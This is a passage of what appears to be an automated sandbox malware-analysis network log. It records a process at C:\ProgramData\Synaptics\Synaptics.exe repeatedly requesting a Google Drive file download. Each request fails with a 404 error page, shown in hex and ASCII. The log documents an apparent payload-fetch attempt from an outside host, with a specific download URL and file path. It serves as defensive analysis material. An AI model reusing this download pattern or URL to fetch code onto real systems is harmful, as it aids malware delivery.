                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="A6oNlp6XzKd3pjN45SYf7A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:55 UTC588INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:55 UTC588INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        194192.168.2.349968142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:55 UTC585OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:55 UTC588INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:55 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-z7wUyXqVxfvhoI4zsj2okg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:55 UTC590INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 44 66 4e 46 34 64 53 6d 66 34 2b 75 4c 66 69 67 2f 4a 76 64 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WDfNF4dSmf4+uLfig/JvdA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:55 UTC591INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:55 UTC591INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        195192.168.2.349969142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:55 UTC588OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:55 UTC591INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:55 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-U6Nca7zbsq8CylF/jaPrYg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:55 UTC593INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:55 UTC593INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 72 58 72 4e 6c 64 43 63 43 69 4b 76 2b 2b 34 62 2f 37 72 61 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="orXrNldCcCiKv++4b/7raQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:55 UTC594INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:55 UTC594INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        196192.168.2.349970142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:55 UTC591OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:55 UTC594INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:55 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-dHRGMOiMu214pwBled1i8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:55 UTC596INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:55 UTC596INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 55 76 57 44 38 58 46 6a 64 78 64 30 73 75 63 77 47 51 47 36 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NUvWD8XFjdxd0sucwGQG6w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:55 UTC597INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:55 UTC597INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        197192.168.2.349971142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:55 UTC594OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:56 UTC597INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:56 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-R6qsgZgtKD+yleGnOMAszg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:56 UTC599INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:56 UTC599INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 7a 38 58 4f 36 75 74 42 5a 4d 6f 48 42 4f 73 35 69 38 79 55 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tz8XO6utBZMoHBOs5i8yUQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:56 UTC600INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:56 UTC600INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        198192.168.2.349972142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:56 UTC597OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:56 UTC600INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:56 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-84VrpbahmnMPFeGwuwGPhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:56 UTC602INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:56 UTC602INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 4c 69 6d 6e 33 79 52 65 2b 34 57 4c 6b 38 41 62 6d 45 50 6a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0Limn3yRe+4WLk8AbmEPjA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
